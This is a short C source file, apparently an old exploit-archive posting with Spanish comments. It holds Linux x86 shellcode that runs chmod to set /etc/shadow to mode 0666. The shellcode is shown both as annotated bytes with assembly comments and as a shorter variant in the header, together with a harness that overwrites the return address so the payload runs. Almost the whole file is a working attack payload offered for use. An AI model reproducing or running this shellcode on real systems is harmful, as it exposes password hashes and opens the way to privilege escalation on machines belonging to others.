/*
* s0t4ipv6@shellcode.com.ar
* 0x04abril0x7d2
*
* int sys_chmod(const char * filename, mode_t mode)
* {...}
*
* Utilizando la interrupcion 15(chmod), asignando el octal 0666
* al archivo deseado. En este caso /etc/shadow
*
* Hice unas modificaciones en el codigo y solo pude reducir la shellcode en 1.
* por el codigo mailme.
* "\x31\xdb\x68\x64\x6f\x77\x53\x68\x2f\x73\x68\x61\x68\x2f\x65"
* "\x74\x63\x89\xe3\x31\xc9\x88\x4c\x24\x0b\x66\xb9\xb6\x01\x31"
* "\xc0\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80";
*
*/
#include <stdio.h>
// Shellcode // Asm Code // Main Interval
char shellcode[]=
"\xeb\x17" // jmp 0x17 [3 ; 4]
"\x5e" // popl %esia [5]
"\x31\xc9" // xorl %ecx, %ecx [6 ; 7]
"\x88\x4e\x0b" // movb %ecx, 0xb(%esi) [8; 10]
"\x8d\x1e" // leal (%esi), %ebx [11;12]
"\x66\xb9\xb6\x01" // movw $0x1b6, %cx // asigno a cx el equivalente en hex al octal 0666
"\x31\xc0" // xorl %eax, %eax [17;18]
"\xb0\x0f" // movb $0xf, %al // Interrupcion 15 (chmod)
"\xcd\x80" // int $0x80 [21;22]
"\x31\xc0" // xorl %eax, %eax // salida
"\x40" // inc %eax [25]
"\xcd\x80" // int $0x80 [26;27]
"\xe8\xe4\xff\xff\xff" // call -0x1c
"/etc/shadow";
main() {
int *ret;
ret=(int *)&ret+2;
printf("Shellcode lenght=%d\n",strlen(shellcode));
(*ret) = (int)shellcode;
}
// milw0rm.com [2004-09-26]
